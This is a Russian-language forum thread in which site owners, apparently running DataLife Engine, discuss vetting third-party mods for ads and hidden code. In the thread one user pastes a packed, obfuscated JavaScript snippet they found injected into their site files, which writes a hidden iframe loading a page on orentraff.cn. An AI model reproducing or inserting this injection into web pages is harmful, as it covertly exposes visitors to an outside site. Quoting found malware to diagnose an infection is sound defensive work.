Перейти к публикации

Рекомендованные сообщения

Проверять null - это бред
отчасти согласен. Времени на проверку ворованной версии вы потратите примерно столько же, за сколько могли бы заработать необходимую сумму на покупку лицензии
Ссылка на сообщение
Поделиться на других сайтах

Что делать если исхдный код закрыт Зендом? - да собственно ничего, ставить мод (плагин) на собственный страх и риск.

Как что в сети полно дезендов и все легко дезендится

Ссылка на сообщение
Поделиться на других сайтах

lifestar, и вообще, все ребята. спасибо! оч необходимая тема.

у меня самого установлено только несколько хаков и 1 модуль. но собираюсь еще как минимум парочку поставить. и вообще-то внимательно проверяю. что ставлю. но так как более-менее силен только в html и css :), то вычищал из них только все ссылки, e-malеs. хых, есть один чел, пишущий модули и хаки (не буду называть) так у него на 100% кода 75% рекламы. безобидно, но все же..))

буду использовать ваше руководство и по-тихоньку расширять свою "карту мира"))

Ссылка на сообщение
Поделиться на других сайтах

Это точно не я:)

Я код аккуратно пишу и без рекламы =)

Только комментарии в самом начале скрипта если вдруг хозяин сайта со мной контакт потеряет =)

Ссылка на сообщение
Поделиться на других сайтах

Kot Da Vinci - Fillosoff, ты про Хаммера? Если да, то у него это считается не рекламой, а копирайтами :)

Ссылка на сообщение
Поделиться на других сайтах

lifestar, не пойду с тобой в разведку!! :D

и мой совет тебе, не зови Хамера Хаммером, он обижается очень :rolleyes:

Ссылка на сообщение
Поделиться на других сайтах

Kot Da Vinci - Fillosoff,

пораднились?

Я к сожалению, не помню история с Хамером, но кажись там было что то не чисто :)

P.S. Все, хватит флудить не по теме.

Ссылка на сообщение
Поделиться на других сайтах

BlackMaster, если честно - не проводил. Стало вдруг резко некогда, проведу через неделю-две :)

Ссылка на сообщение
Поделиться на других сайтах
  • 4 недели спустя...

Да, это очень поучительная тема. Я конечно тоже стараюсь проверять, но...

У меня непонятный чужой код как-то просочился в четыре файла папки /ajax при чем в "родные" файлы, типа dle_ajax.js с java скриптами.

Причиной проверки стало недавнее появление "чужой" ссылки в начале загрузки сайта.

Найти-то я нашел, но вот как они туда попали, неизвестно пока... Из сторонних модулей стоит только Arcade (мод игр), да блока OnLine. Но я эти модуль и блок использую достаточно давно и раньше ничего не было..

Java scrits в общем-то довольно стремная вещь сама по себе... Пока мыслей нет, ищу.

Ссылка на сообщение
Поделиться на других сайтах

непонятный чужой код как-то просочился в четыре файла
интересно посмотреть на код

ava scrits в общем-то довольно стремная вещь сама по себе
а мне язык ява скрипт очень даже нравится =)
Ссылка на сообщение
Поделиться на других сайтах

интересно посмотреть на код

а мне язык ява скрипт очень даже нравится =)

Мне тоже нравится ява, но она довольно опасная штучка :)

Кусочек "чужого" кода такой (это только в файлах .js, но есть еще и в .php):

eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('d.f("<1 6=\'7://5.4/2.3?8\' 9=\'0\' e=\'0\' c=\'a:b\'></1>");',16,16,'|iframe|in|cgi|cn|orentraff|src|http||width|display|none|style|document|heig

ht|write'.split('|'),0,{}))

в итоге в начале загрузки страницы идет ссылка orentraff.cn....

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...